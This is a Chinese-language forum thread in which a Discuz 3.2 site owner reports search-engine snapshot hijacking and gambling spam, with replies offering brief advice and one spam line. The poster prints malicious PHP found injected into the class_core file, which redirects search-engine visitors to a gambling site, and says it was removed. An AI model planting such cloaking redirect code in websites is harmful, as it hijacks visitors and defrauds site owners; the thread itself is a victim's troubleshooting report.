最新快照劫持及网页篡改网站入侵挂马问题

dz3.2论坛发现网站快照搜索引擎收录，同本网站内容不一致,百度和360以及搜狗都收录了大量本站不存在的帖子，论坛所有帖子和回复都是人工审核的，不可能出现收录的这种博彩类信息。百度收录的快照都点进去不存在，360收录的快照点进去有的是真是的帖子，但和快照内容不一样（帖子内容被替换），有的从搜索引擎点击跳转到一个博彩网站，后检查代码删除一段代码后，不跳转了。
如site:www.op5u.com,出现一堆博彩网站

后来又发现，用百度和360站在工具模拟抓取依然所有文件头部都被插入了链接


技术小白，第一次碰到这种问题，然后在官网上各种查以前朋友遇到是怎么处理的。后台检验文件什么的，经过检查对比文件发现以下几处异常
一、class_core文件头部插入跳转代码

1. error_reporting(E_ALL);
   
2. @error_reporting(1);
   
3. @$ref = strtolower($_SERVER['HTTP_REFERER']);
   
4. @$jump_ref  = explode("|","haoso.|so.|haosou.|google.|soso.");
   
5. foreach($jump_ref as $r){
   
6.         $r = trim($r);
   
7.         if(stristr($ref,$r)){
   
8.                 if($_GET['tid']>50000){
   
9.                         header('Location: http://www.yzx002.com/?op5u');
   
10.                         die();
    
11.                 }
    
12.         }
    
13. }

复制代码

追加，经过不断排查代码 基本上找到清除完了恶意代码，目前收录逐步恢复中。。。

不会是哪里设置的问题吧。

sf999jjjjjj神途发布网我本沉默ka
传奇sf网页传奇传世sf传世sf99s传奇

补丁打到最新

服务器可能都中毒了 先检查清理哦

设置文件权限即可。

跟你一样，到现在还不知道原因。。修改了，没几个小时又恢复。。现在是更新缓存，就正常，几个小时后又被劫持。。

chbigeye 发表于 2016-12-16 15:07
跟你一样，到现在还不知道原因。。修改了，没几个小时又恢复。。现在是更新缓存，就正常，几个小时后又被劫 ...

服务器中毒了 尽快清理哦

chbigeye 发表于 2016-12-16 15:07
跟你一样，到现在还不知道原因。。修改了，没几个小时又恢复。。现在是更新缓存，就正常，几个小时后又被劫 ...

我的基本上解决了，收录恢复更新中

张老师101 发表于 2016-12-17 09:51
我的基本上解决了，收录恢复更新中

我的QQ：198587 ，麻烦你加下，有问题想请教！